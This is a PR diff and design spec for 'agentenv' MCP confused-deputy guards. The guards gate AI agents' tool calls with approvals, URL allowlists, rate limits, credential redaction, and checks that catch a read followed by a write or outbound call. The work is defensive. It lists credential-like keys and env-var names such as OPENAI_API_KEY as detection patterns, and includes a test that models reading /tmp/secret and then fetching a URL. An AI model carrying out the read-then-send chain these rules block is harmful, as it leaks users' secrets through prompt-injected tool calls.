+        return Ok(None);
+    };
+    let Some(guards) = mcp.get("confused_deputy_guards").cloned() else {
+        return Ok(None);
+    };
+    let config = serde_yaml::from_value::<agentenv_proto::McpGuardConfig>(guards)
+        .map_err(|source| RuntimeError::Driver(DriverError::InvalidInput {
+            message: format!("invalid policy.mcp.confused_deputy_guards: {source}"),
+        }))?;
+    Ok(config.enabled.then_some(config))
+}
+```
+
+- [ ] **Step 4: Rewrite HTTP and stdio endpoints before rendering agent config**
+
+Before `prepare_agent_sandbox_setup`, compute:
+
+```rust
+let mcp_guard_config = mcp_guard_config_from_policy_extra(&resolved.blueprint.policy.extra)?;
+let context_endpoint_for_sandbox = rewrite_context_endpoint_for_proxy(&context_endpoint, &egress_proxy_plan);
+let guarded_context_endpoint = rewrite_context_endpoint_for_mcp_guard(
+    name,
+    &context_endpoint_for_sandbox,
+    mcp_guard_config.as_ref(),
+    temp_paths.env_dir(),
+)?;
+```
+
+For HTTP, pass `guard_config` into `McpProxySource` before building the egress proxy plan. For stdio, rewrite the command and arrange for config copy through `AgentSandboxSetup`.
+
+Add to `AgentSandboxSetup`:
+
+```rust
+extra_files: Vec<AgentSandboxFile>,
+```
+
+where:
+
+```rust
+struct AgentSandboxFile {
+    host_path: PathBuf,
+    sandbox_path: String,
+    mode: &'static str,
+}
+```
+
+Copy these files in `install_agent_in_sandbox`.
+
+- [ ] **Step 5: Run focused runtime tests**
+
+Run:
+
+```bash
+cargo test -p agentenv-core create_env_rewrites_stdio_mcp_endpoint_when_guard_enabled
+cargo test -p agentenv-core create_env_rewrites_http_context_mcp_endpoint_when_mcp_token_is_brokered
+```
+
+Expected: both tests pass.
+
+---
+
+## Task 9: Add Cross-Tool Flow Regression Coverage
+
+**Files:**
+- Modify: `crates/agentenv-mcp/src/guard.rs`
+
+- [ ] **Step 1: Write failing evaluator tests**
+
+Add:
+
+```rust
+#[test]
+fn read_then_write_inside_flow_window_requires_approval() {
+    let config = agentenv_proto::McpGuardConfig {
+        enabled: true,
+        default_approval: agentenv_proto::McpApprovalMode::Never,
+        tool_policies: BTreeMap::new(),
+        cross_tool_flows: agentenv_proto::McpCrossToolFlowPolicy {
+            forbid_read_to_write_turns: Some(5),
+        },
+    };
+    let mut state = GuardSessionState::default();
+    let read = serde_json::json!({
+        "jsonrpc": "2.0",
+        "id": 1,
+        "method": "tools/call",
+        "params": {"name": "filesystem.read", "arguments": {"path": "/tmp/secret"}}
+    });
+    let write = serde_json::json!({
+        "jsonrpc": "2.0",
+        "id": 2,
+        "method": "tools/call",
+        "params": {"name": "web.fetch", "arguments": {"url": "https://api.github.com/repos"}}
+    });
+
+    let first = evaluate_json_rpc_request(&config, &mut state, &read).unwrap();
+    let second = evaluate_json_rpc_request(&config, &mut state, &write).unwrap();
+
+    assert_eq!(first.action, GuardAction::Forward);
+    assert_eq!(second.action, GuardAction::RequestApproval);
+    assert_eq!(second.reason, GuardReason::CrossToolFlow);
+}
+
+#[test]
+fn session_rate_limit_denies_after_limit() {
+    let config = agentenv_proto::McpGuardConfig {
+        enabled: true,
+        default_approval: agentenv_proto::McpApprovalMode::Never,
+        tool_policies: [("filesystem.read".to_owned(), agentenv_proto::McpToolPolicy {
+            rate_limit: Some(agentenv_proto::McpSessionRateLimit { calls: 1 }),
+            ..agentenv_proto::McpToolPolicy::default()
+        })].into_iter().collect(),
+        cross_tool_flows: agentenv_proto::McpCrossToolFlowPolicy::default(),
+    };
+    let mut state = GuardSessionState::default();
+    let request = serde_json::json!({
+        "jsonrpc": "2.0",
+        "id": 1,
+        "method": "tools/call",
+        "params": {"name": "filesystem.read", "arguments": {"path": "/tmp/a"}}
+    });
+
+    assert_eq!(evaluate_json_rpc_request(&config, &mut state, &request).unwrap().action, GuardAction::Forward);
+    let second = evaluate_json_rpc_request(&config, &mut state, &request).unwrap();
+    assert_eq!(second.action, GuardAction::Deny);
+    assert_eq!(second.reason, GuardReason::RateLimited);
+}
+```
+
+- [ ] **Step 2: Run tests and verify failure**
+
+Run:
+
+```bash
+cargo test -p agentenv-mcp read_then_write_inside_flow_window_requires_approval session_rate_limit_denies_after_limit
+```
+
+Expected: tests fail until stateful evaluation is complete.
+
+- [ ] **Step 3: Implement stateful counters and flow window**
+
+Use the matched policy pattern as the rate counter key, falling back to the tool name. After each tool call, decrement old read windows and push a new read marker for read-like tools. Before allowing a write-like or external-like tool, check whether any read marker remains.
+
+- [ ] **Step 4: Run all guard tests**
+
+Run:
+
+```bash
+cargo test -p agentenv-mcp guard
+```
+
+Expected: all guard tests pass.
+
+---
+
+## Task 10: Documentation And Blueprint Examples
+
+**Files:**
+- Modify: `docs/ARCHITECTURE.md`
+- Modify: `docs/BLUEPRINTS.md`
+- Modify: `docs/DRIVER_PROTOCOL.md`
+- Modify: selected blueprints under `blueprints/`
+
+- [ ] **Step 1: Update architecture docs**
+
+Add a subsection under `The narrow waist: MCP`:
+
+```markdown
+### MCP tool-call guards
+
+When `policy.mcp.confused_deputy_guards.enabled` is true, core rewrites the
+agent-visible `McpEndpoint` through a guard. HTTP and HTTP+SSE endpoints are
+guarded in the host egress proxy; stdio endpoints are guarded by an
+`agentenv mcp-guard run` wrapper. Context drivers still return ordinary
+`McpEndpoint` values and agent drivers still render ordinary MCP config.
+```
+
+- [ ] **Step 2: Update blueprint docs**
+
+Add the YAML example from the design spec to `docs/BLUEPRINTS.md` and explain
+that examples are commented out by default.
+
+- [ ] **Step 3: Update protocol docs**
+
+Add a note to `docs/DRIVER_PROTOCOL.md` under `ContextDriver`:
+
+```markdown
+Core may rewrite an `McpEndpoint` for guard mediation before passing it to an
+agent driver. This is not a driver protocol change; context drivers continue to
+report the unmediated endpoint they provision.
+```
+
+- [ ] **Step 4: Add commented blueprint examples**
+
+In filesystem and MCP generic reference blueprints, add commented `policy.mcp`
+examples without enabling them by default.
+
+- [ ] **Step 5: Run docs-adjacent tests**
+
+Run:
+
+```bash
+cargo test -p agentenv-core reference_blueprints
+cargo test -p blueprint-integration
+```
+
+Expected: reference blueprint parsing remains green.
+
+---
+
+## Task 11: Final Verification And Cleanup
+
+**Files:**
+- All modified files
+
+- [ ] **Step 1: Run formatting**
+
+Run:
+
+```bash
+cargo fmt
+```
+
+Expected: command exits 0.
+
+- [ ] **Step 2: Run clippy**
+
+Run:
+
+```bash
+cargo clippy --workspace -- -D warnings
+```
+
+Expected: command exits 0. Fix any warnings without broad refactors.
+
+- [ ] **Step 3: Run full workspace tests**
+
+Run:
+
+```bash
+cargo test --workspace
+```
+
+Expected: command exits 0.
+
+- [ ] **Step 4: Inspect git diff**
+
+Run:
+
+```bash
+git status --short
+git diff --stat
+```
+
+Expected: only issue #42 files are changed.
+
+- [ ] **Step 5: Commit implementation**
+
+Run:
+
+```bash
+git add crates/agentenv-mcp crates/agentenv-core crates/agentenv docs blueprints
+git commit -m "feat(mcp): guard tool-call ambient authority"
+```
+
+Expected: commit succeeds.
+
+---
+
+## Self-Review
+
+- Spec coverage: The plan covers full-scope HTTP/HTTP+SSE and stdio mediation, per-tool policy, redaction, URL allowlists, env/credential-looking argument detection, session-local read-to-write flow checks, approvals, events, docs, and verification.
+- Placeholder scan: No implementation steps rely on placeholders; every task includes concrete paths, tests, and commands.
+- Type consistency: Serializable guard config types are defined in Task 1; evaluator state and decision types are defined in Task 2; later tasks reference those same type names.

--- a/docs/superpowers/specs/2026-05-15-issue-42-mcp-confused-deputy-guards-design.md
+++ b/docs/superpowers/specs/2026-05-15-issue-42-mcp-confused-deputy-guards-design.md
@@ -1,0 +1,345 @@
+# H-6 Design: MCP Confused-Deputy Tool-Call Guards
+
+Date: 2026-05-15
+Issue: [#42](https://github.com/windoliver/agentenv/issues/42)
+Label: hardening
+
+## Summary
+
+Issue #42 adds a core-owned mediation layer between agents and MCP context
+servers so prompt-injected tool calls cannot silently use ambient MCP authority.
+The full-scope implementation covers both URL-based MCP transports and stdio MCP
+servers:
+
+- HTTP and HTTP+SSE MCP endpoints are mediated in the existing host egress proxy.
+- Stdio MCP endpoints are mediated by an `agentenv mcp-guard run` wrapper that
+  spawns the original command and relays JSON-RPC frames.
+
+The guard evaluates MCP tool calls, emits redacted audit events, enforces
+per-tool policy, blocks credential-looking arguments from logs, flags
+credential-looking values in tool arguments, and routes approval-required calls
+through the existing approvals queue.
+
+The GitHub app available in this workspace could not post the required issue
+approach comment because GitHub returned `403 Resource not accessible by
+integration`. Before implementation starts, a maintainer must either post the
+approach from this spec on issue #42 or explicitly accept this spec as the
+approach record.
+
+## Affected Crates And Docs
+
+- `crates/agentenv-core`
+- `crates/agentenv-mcp`
+- `crates/agentenv`
+- `crates/agentenv-events`
+- `crates/agentenv-approvals`
+- `docs/ARCHITECTURE.md`
+- `docs/DRIVER_PROTOCOL.md`
+- `docs/BLUEPRINTS.md`
+- reference blueprints that should demonstrate MCP guard configuration
+
+No driver protocol schema bump is expected. Context drivers still return
+`McpEndpoint`; agent drivers still consume `McpEndpoint`; runtime rewrites the
+endpoint passed between them.
+
+## Goals
+
+1. Mediate all agent-visible MCP tool calls before they reach a context server.
+2. Preserve MCP as the agent-to-context narrow waist.
+3. Preserve JSON-RPC as the core-to-driver narrow waist.
+4. Support exact and wildcard per-tool policy.
+5. Support approval modes `never`, `per-call`, and `per-session`.
+6. Redact credential-like values from logged tool arguments.
+7. Detect environment-variable-looking and credential-looking argument values.
+8. Enforce URL allowlists for URL-looking arguments.
+9. Emit redacted `mcp_tool_call` activity events for allowed, denied, and
+   approval-pending calls.
+10. Reuse the existing approvals queue for blocked MCP calls.
+11. Track session-local read-to-write flows and require approval when a recent
+    read-like tool call is followed by a write-like or external tool call.
+
+## Non-Goals
+
+- Inferring arbitrary model-turn taint outside the guarded MCP session.
+- Adding a new driver kind or fifth pluggable axis.
+- Changing MCP server implementations.
+- Changing the driver protocol method signatures.
+- Supporting non-MCP HTTP traffic in the MCP guard.
+- Guaranteeing semantic classification of every third-party tool name. The first
+  implementation uses explicit policy plus conservative name-based read/write
+  classification.
+
+## Chosen Approach
+
+Implement a core-owned MCP guard that rewrites the MCP endpoint passed from the
+context driver to the agent driver.
+
+For HTTP and HTTP+SSE endpoints, `agentenv-core` extends the existing egress
+proxy plan with an MCP guard config. The `agentenv proxy run` process inspects
+JSON-RPC request bodies on MCP routes before forwarding upstream. It evaluates
+tool calls and either forwards, denies, or submits an approval request and waits
+for the decision.
+
+For stdio endpoints, `agentenv-core` rewrites the endpoint command to:
+
+```text
+agentenv mcp-guard run --env <name> --config <host-config-path> --stdio-upstream <encoded-command>
+```
+
+The wrapper runs inside the sandbox, starts the original stdio MCP command as a
+child process, and relays JSON-RPC messages between the agent and the upstream
+server. The wrapper contains only non-secret policy and approval endpoint
+metadata. It writes no credentials and logs only redacted request metadata.
+
+## Policy Configuration
+
+MCP guard configuration lives under the existing blueprint `policy` section as
+core-parsed extra YAML:
+
+```yaml
+policy:
+  mcp:
+    confused_deputy_guards:
+      enabled: true
+      default_approval: per-call
+      tool_policies:
+        "filesystem.read":
+          approval: never
+          rate_limit: 50/session
+        "web.fetch":
+          approval: per-call
+          url_allowlist: ["api.github.com", "crates.io"]
+          redact_args: true
+        "*.write":
+          approval: per-session
+      cross_tool_flows:
+        forbid_read_to_write_turns: 5
+```
+
+### Supported Fields
+
+- `enabled`: defaults to `false` for compatibility. When false, runtime leaves
+  MCP endpoints unchanged except for existing egress proxy credential brokering.
+- `default_approval`: one of `never`, `per-call`, or `per-session`. This applies
+  when no exact or wildcard tool policy matches.
+- `tool_policies`: map of exact tool names or one-segment wildcard patterns such
+  as `*.write` and `filesystem.*`.
+- `approval`: overrides the default approval mode for a matching tool.
+- `rate_limit`: optional `<number>/session` call cap for a matching tool.
+- `url_allowlist`: optional host allowlist applied to string arguments that parse
+  as URLs or contain URL-looking text.
+- `redact_args`: when true, logged arguments are always summarized rather than
+  field-by-field redacted.
+- `cross_tool_flows.forbid_read_to_write_turns`: when set, a read-like tool call
+  records session-local provenance for N subsequent tool calls. A write-like or
+  external tool call inside that window requires approval.
+
+Invalid guard config fails blueprint verification with a precise field path.
+
+## Tool Evaluation
+
+`agentenv-mcp` owns the policy model and pure evaluator:
+
+- Parse MCP JSON-RPC requests and identify tool-call requests. The first
+  supported canonical method is `tools/call`, with the tool name read from
+  `params.name`.
+- Leave non-tool JSON-RPC methods untouched.
+- Match tool policies in this order: exact tool name, most-specific wildcard,
+  default policy.
+- Reject malformed policy and malformed tool-call params before forwarding.
+- Apply URL allowlists to URL-looking string values found anywhere in JSON
+  arguments.
+- Detect credential-like argument keys such as `token`, `password`, `secret`,
+  `api_key`, `authorization`, and `credential`.
+- Detect environment-variable-looking string values such as `OPENAI_API_KEY`,
+  `GITHUB_TOKEN`, and `${MCP_TOKEN}`.
+- Redact logs with the existing event redaction behavior plus MCP-specific URL
+  query and fragment stripping.
+- Track per-session rate counters.
+- Track recent read-like calls for session-local read-to-write approval.
+
+Tool classification is conservative:
+
+- Read-like names contain or end with `read`, `get`, `list`, `search`, `fetch`,
+  `query`, or `download`.
+- Write-like names contain or end with `write`, `create`, `update`, `delete`,
+  `remove`, `send`, `post`, `put`, `patch`, `upload`, or `publish`.
+- External-like names include URL arguments or host/network markers.
+- Explicit tool policy can override these classifications in a later extension,
+  but this PR keeps the YAML surface focused on the issue examples.
+
+## Approvals
+
+The guard creates `ApprovalRequest` records with:
+
+- `kind`: `mcp_tool`
+- `subject`: the MCP tool name
+- `reason`: a stable reason code such as `approval_required`,
+  `url_allowlist_violation`, `credential_like_argument`, `rate_limited`, or
+  `cross_tool_flow`
+- `context`: redacted method, tool name, matched policy, argument summary,
+  transport, endpoint route id, and flow reason
+- `default_scope`: `once` for `per-call`, `session` for `per-session`
+
+For HTTP MCP routes, the proxy process can open the env-scoped approval store
+and wait for decisions directly, matching the existing egress proxy process
+model.
+
+For stdio MCP routes, the wrapper can use the same env-scoped store path and
+approval coordinator configuration because it is launched by `agentenv` with the
+env name and root path. The wrapper sends no driver RPC and stores no secrets.
+
+Allowed session approvals are enforced by the guard evaluator using its local
+session grant cache. Persisted approval decisions remain recorded in the
+approval store and overlay/proposal files through the existing coordinator side
+effects.
+
+## HTTP And HTTP+SSE Flow
+
+1. Context driver returns an HTTP or HTTP+SSE `McpEndpoint`.
+2. Runtime validates and plans the existing egress proxy route.
+3. Runtime attaches MCP guard config to the route when guards are enabled.
+4. Agent receives the rewritten proxy URL and no upstream credential headers.
+5. Proxy receives MCP JSON-RPC requests on `/v1/mcp/<route>`.
+6. Proxy evaluates tool-call requests before credential injection.
+7. Proxy forwards allowed requests upstream with brokered auth.
+8. Proxy emits redacted `mcp_tool_call` and egress events.
+
+HTTP+SSE response streaming stays unchanged. The guard only inspects incoming
+client-to-server request bodies. Streaming response bodies are not parsed for
+taint in this PR.
+
+## Stdio Flow
+
+1. Context driver returns a stdio `McpEndpoint` whose `url` field contains the
+   command to run.
+2. Runtime rewrites the command to `agentenv mcp-guard run`.
+3. Runtime writes a host-side guard config next to other agent assets and copies
+   it into the sandbox with mode `0600`.
+4. The wrapper decodes the original command, starts it as a child process, and
+   relays LSP-style JSON-RPC frames.
+5. The wrapper evaluates outbound `tools/call` requests before writing them to
+   the child process.
+6. The wrapper forwards non-tool requests and upstream responses unchanged.
+7. The wrapper exits when either side closes or when the child process exits.
+
+The wrapper must preserve MCP framing exactly. Invalid frame headers or invalid
+JSON-RPC messages are denied with a JSON-RPC error response to the agent and are
+not forwarded upstream.
+
+## Error Handling
+
+- Policy parse errors fail blueprint verification.
+- Missing approval store access fails closed for approval-required tool calls.
+- Approval timeout returns a JSON-RPC error to the agent and emits
+  `approval_decided` through the existing auto-deny path.
+- URL allowlist violations return a JSON-RPC error and emit a denied
+  `mcp_tool_call` event.
+- Credential-like argument detection requires approval by default. If the
+  matching tool policy uses `approval: never`, the event is flagged but the call
+  is allowed.
+- Rate-limit violations deny without approval unless a matching policy explicitly
+  uses `approval: per-call` or `per-session`.
+- Stdio child process failure returns a clear JSON-RPC internal error for the
+  in-flight request and exits after flushing events.
+- HTTP upstream failures preserve the existing egress proxy behavior.
+
+## Event Model
+
+Every evaluated tool call emits a redacted `ActivityEvent`:
+
+- `kind`: `mcp_tool_call`
+- `result`: `ok`, `denied`, `pending_approval`, or `error`
+- `actor.kind`: `mcp_guard`
+- `subject.tool`: tool name
+- `subject.transport`: `stdio`, `http`, or `http+sse`
+- `subject.route_id`: proxy route id when present
+- `reason_code`: stable guard decision reason
+- `extras.arg_summary`: object with redacted keys, URL origins, and flags
+- `extras.policy`: matched policy pattern and approval mode
+
+The event payload must never include raw credential values, raw URL query
+strings, raw URL fragments, or original authorization headers.
+
+## Security Notes
+
+- The guard is fail-closed when it cannot parse enabled policy or cannot reach
+  the approval store for a call requiring approval.
+- The stdio wrapper cannot protect data that an MCP server sends directly to the
+  agent and the agent later copies into a non-MCP channel. That needs broader
+  turn-level provenance and is outside this PR.
+- The read-to-write guard is session-local and MCP-only. It catches the issue's
+  cross-MCP tool chaining pattern when both calls pass through the guard.
+- The existing host egress proxy remains responsible for credential injection
+  and upstream SSRF validation.
+- Context drivers do not receive or store approval decisions.
+
+## Testing Strategy
+
+Testing follows TDD per behavior slice.
+
+### `agentenv-mcp`
+
+- Policy YAML deserializes valid config and rejects unknown fields.
+- Exact match beats wildcard match.
+- Most-specific wildcard beats broad wildcard.
+- Default approval applies when no policy matches.
+- URL allowlist detects URL-looking nested argument strings.
+- Secret-like keys and env-var-looking values are flagged.
+- Redaction removes credential keys, URL query strings, URL fragments, and
+  authorization-like values.
+- Rate limits are counted per session.
+- Recent read-like calls trigger write-like approval inside the configured
+  window.
+
+### `agentenv`
+
+- HTTP MCP proxy route denies URL allowlist violations before credential
+  resolution.
+- HTTP MCP proxy route emits redacted `mcp_tool_call` events.
+- HTTP MCP proxy route forwards allowed tool calls with brokered credentials.
+- Stdio guard relays non-tool JSON-RPC messages unchanged.
+- Stdio guard blocks or approval-gates tool calls before writing to upstream.
+- Stdio guard returns JSON-RPC errors for malformed frames.
+
+### `agentenv-core`
+
+- Runtime rewrites HTTP MCP endpoints with guard config when enabled.
+- Runtime rewrites stdio MCP commands to the guard wrapper when enabled.
+- Runtime leaves endpoints unchanged when guard config is disabled.
+- Runtime copies guard config into the sandbox and passes no secrets.
+- Blueprint verification rejects invalid `policy.mcp` config.
+
+### Workspace Verification
+
+Final verification commands:
+
+```bash
+cargo fmt
+cargo clippy --workspace -- -D warnings
+cargo test --workspace
+```
+
+## Rollout And Compatibility
+
+The feature is disabled unless `policy.mcp.confused_deputy_guards.enabled` is
+true. Existing blueprints and lockfiles continue to work unchanged.
+
+Reference blueprints should add commented examples rather than enabling guards
+by default. A later hardening profile can enable a safe default once enough
+third-party MCP tool naming patterns are known.
+
+## Trade-Offs
+
+The chosen design adds mediation in core runtime instead of drivers. That keeps
+security policy centralized and avoids multiplying behavior across agent and
+context drivers, but it makes runtime responsible for command rewriting and
+proxy configuration.
+
+The stdio guard wrapper is more work than the HTTP-only path, but it is required
+for full issue coverage because the filesystem context and many local MCP
+servers use stdio.
+
+Session-local read-to-write flow tracking is intentionally narrower than full
+taint propagation. It is enforceable with the data agentenv already controls and
+does not pretend to solve arbitrary prompt-level provenance.


### PR DESCRIPTION
## Summary
- Adds `policy.mcp.confused_deputy_guards` schema/types and blueprint validation for MCP confused-deputy protections.
- Adds an `agentenv-mcp` guard evaluator plus HTTP proxy and stdio wrapper enforcement for tool-call policy, URL allowlists, credential redaction/detection, read-to-write flow approval, and per-session rate limits.
- Rewrites guarded MCP endpoints during env creation, carries guard config through brokered routes, and documents the policy surface with reference blueprint examples.

## Affected crates
- `agentenv-proto`
- `agentenv-mcp`
- `agentenv-core`
- `agentenv`

## Trade-offs
- The guard is implemented at the MCP boundary instead of driver-specific shortcuts, preserving the existing MCP/JSON-RPC narrow waist.
- Approval-required guard decisions fail closed when the local approval coordinator is unavailable.
- Stdio guarding wraps configured commands with `agentenv mcp-guard run`, which keeps agent config explicit but requires the sandbox-visible guard config file.

Closes #42.

## Test Plan
- `cargo fmt --check`
- `cargo clippy --workspace -- -D warnings`
- `cargo test --workspace`
- `git diff --check`